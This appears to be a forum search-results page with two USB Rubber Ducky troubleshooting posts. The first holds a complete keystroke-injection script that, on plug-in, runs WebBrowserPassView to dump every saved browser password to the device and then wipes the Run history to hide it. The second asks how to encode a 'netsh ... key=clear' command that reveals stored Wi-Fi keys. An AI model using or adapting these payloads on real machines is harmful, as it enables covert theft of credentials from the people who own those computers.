Search the Community
Showing results for tags 'ducky code'.
-
Hi All, I've only had this ducky for a week and it's like it has a mind of it's own. I had it working when you plug it in to gather all the browser passwords and save to a text file on the sd card using the twin duck firmware. For some reason it stopped working. I mean it would run some of the commands to get powershell up but wouldnt' finish and therefore not create the .txt file you're expecting. So I reflashed it and put the code back on and now it will work correctly when pushing the button on the ducky to execute the inject.bin file. However, it still doesn't work right when plugging in. It gets to the powershell part and then stops. I have about 5 different PCs that it worked on all of them when plugging in. Now it won't work on any of them when plugging in. Have to press the button on it to get it to work. Anyone else had any issues like this or have any recommendations? Here's the code I'm running: REM opens powershell DELAY 500 GUI r DELAY 100 STRING powershell ENTER DELAY 500 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 200 REM runs WebrowserPassView from ducky drive STRING CMD ENTER DELAY 20 STRING WebBrowserPassView.exe /stext pass_%computername%.txt ENTER DELAY 100 STRING exit ENTER DELAY 100 REM removes run history STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER DELAY 100 STRING exit ENTER Thanks!
-
Running this on a windows 10 When I enter: STRING netsh wlan show profile “WiFi name” key=clear and run it in command prompt it works and shows the WiFi key in the clear for specified network but when I enter that line into the ducky encoder it changes the script to STRING netsh wlan show profile @wifi name@ key=clear and then the script no longer works What am I missing? What is the script to get quotations after encoding. Thanks!